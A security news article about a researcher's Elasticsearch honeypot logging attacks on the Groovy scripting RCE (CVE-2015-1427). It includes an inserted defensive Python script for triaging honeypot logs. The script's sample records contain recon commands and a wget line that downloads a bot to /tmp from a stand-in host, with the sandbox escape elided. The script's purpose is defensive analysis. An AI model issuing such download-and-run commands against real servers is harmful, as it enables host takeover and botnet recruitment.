Elasticsearch Honeypot Snares 8,000 Attacks Against RCE Vulnerability

Hackers are exploiting a remote code execution vulnerability in Elasticsearch, according to one researcher who published logs from a honeypot he built showing 8,000 attempts to exploit the bug.

Hackers have taken an interest in Elasticsearch, a popular enterprise search engine.

A researcher based in Texas, whose own Elasticsearch server was hacked, today published results collated from a honeypot he built to get a sense of how widespread attacks are against the vulnerability that did in his server.

Jordan Wright said he saw close to 8,000 attempts against his Elastichoney honeypot, most of those (93 percent) coming from Chinese IP addresses; about 300 unique IPs tried to attack his honeypot.

Their means of attack was exploit code against a remote code execution vulnerability discovered earlier this year in Elasticsearch. The attackers were using the vulnerability (CVE-2015-1427) to automatically download and run malware on vulnerable Elasticsearch servers. In Wright’s case, he said one of his virtual servers running on Digital Ocean was attacking other hosts in distributed denial-of-service attacks.

The vulnerability has been patched in Elasticsearch since February; in versions older than 1.4.3, an attacker exploiting an issue in the Elasticsearch Groovy scripting engine is able to bypass the built-in sandbox protections. Exploit code allows an attacker to execute shell commands on the server.

“Since this is an unauthenticated remote code execution (RCE) vulnerability, any attacker that can reach the server can run any system commands they want,” Wright told Threatpost. “In most cases, this allows them to take full control of the host. They can compromise multiple hosts in this fashion to form a botnet to do their bidding.”

Wright has made his Elastichoney logs available for download. Most of the activity, he said, was the use of whoami commands, which display domain and user name information, but in some instances, including the attack against his server, the attackers used wget commands to download and run the malware from a third-party server. Wright said the samples were “basic bots.”
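As an added illustration of the kind of triage a defender would run over such logs (this is example code, not Elastichoney's own tooling, and the JSON-lines record layout and all addresses below are constructed), the script separates requests that carry a Groovy script from ordinary queries, classifies each script as reconnaissance (whoami-style) or a downloader (wget/curl), and counts attempts and unique source IPs:

```python
import json
import re
from collections import Counter

# Constructed sample records in a hypothetical JSON-lines honeypot format:
# source IP, timestamp, and the request body the client sent. The
# sandbox-escape portion of each script is deliberately elided.
SAMPLE_LOG = """\
{"source": "203.0.113.10", "timestamp": "2015-03-21T02:14:07Z", "body": {"size": 1, "script_fields": {"x": {"lang": "groovy", "script": "<sandbox-escape elided> 'whoami'"}}}}
{"source": "203.0.113.10", "timestamp": "2015-03-21T02:14:09Z", "body": {"size": 1, "script_fields": {"x": {"lang": "groovy", "script": "<sandbox-escape elided> 'wget http://198.51.100.7/bot -O /tmp/bot'"}}}}
{"source": "198.51.100.23", "timestamp": "2015-04-02T11:00:00Z", "body": {"size": 1, "script_fields": {"x": {"script": "<sandbox-escape elided> 'id'"}}}}
{"source": "192.0.2.55", "timestamp": "2015-04-10T23:59:59Z", "body": {"query": {"match_all": {}}}}
"""

URL_RE = re.compile(r"https?://[^\s'\"]+")
DOWNLOADERS = {"wget", "curl"}
RECON = {"whoami", "id", "uname"}


def extract_scripts(body):
    """Return the Groovy scripts in a request body's script_fields.
    A missing 'lang' is treated as groovy, the default in Elasticsearch 1.4.x."""
    scripts = []
    for field in body.get("script_fields", {}).values():
        if field.get("lang", "groovy") == "groovy" and "script" in field:
            scripts.append(field["script"])
    return scripts


def classify(script):
    """Label a script by the shell command it carries (downloader beats recon)."""
    tokens = set(re.findall(r"[a-z_]+", script.lower()))
    if tokens & DOWNLOADERS:
        return "downloader"
    if tokens & RECON:
        return "recon"
    return "other-script"


def triage(log_text):
    """Summarise exploit attempts: requests with no script are plain queries."""
    sources, intents, urls = Counter(), Counter(), set()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        scripts = extract_scripts(rec.get("body", {}))
        if not scripts:
            continue
        sources[rec["source"]] += 1
        for script in scripts:
            intents[classify(script)] += 1
            urls.update(URL_RE.findall(script))
    return {"attempts": sum(sources.values()), "unique_sources": len(sources),
            "top_sources": sources.most_common(3), "intents": dict(intents),
            "payload_urls": sorted(urls)}


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_LOG), indent=2))
```

The payload URLs it collects are the values a defender would block at the egress proxy and submit to sandbox analysis, not fetch by hand.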

“I’ve only seen attacks from about 300 unique IP addresses; it tells me that this vulnerability still isn’t too widely known,” Wright said. “Unauthenticated RCE vulnerabilities are quick wins for attackers.”

His honeypot is open source and mimics a vulnerable Elasticsearch instance online, and logs all activity against the vulnerability.

“In my own logs, I suppose an interesting observation would be the geographic distribution of these attacks. 93% of attacks were coming from multiple IP addresses for systems located in China,” Wright said. “While IP address doesn’t equal attribution, these are the systems performing the attacks.”

The timeline for the majority of attacks spiked between March 20 and April 11 and stopped at the same time, Wright said.

“I haven’t done the research to determine how many vulnerable systems are available, but my guess is that Elasticsearch users will be the same as other users,” Wright said. “Some will patch, some won’t. This bug will likely be around for quite a while.”
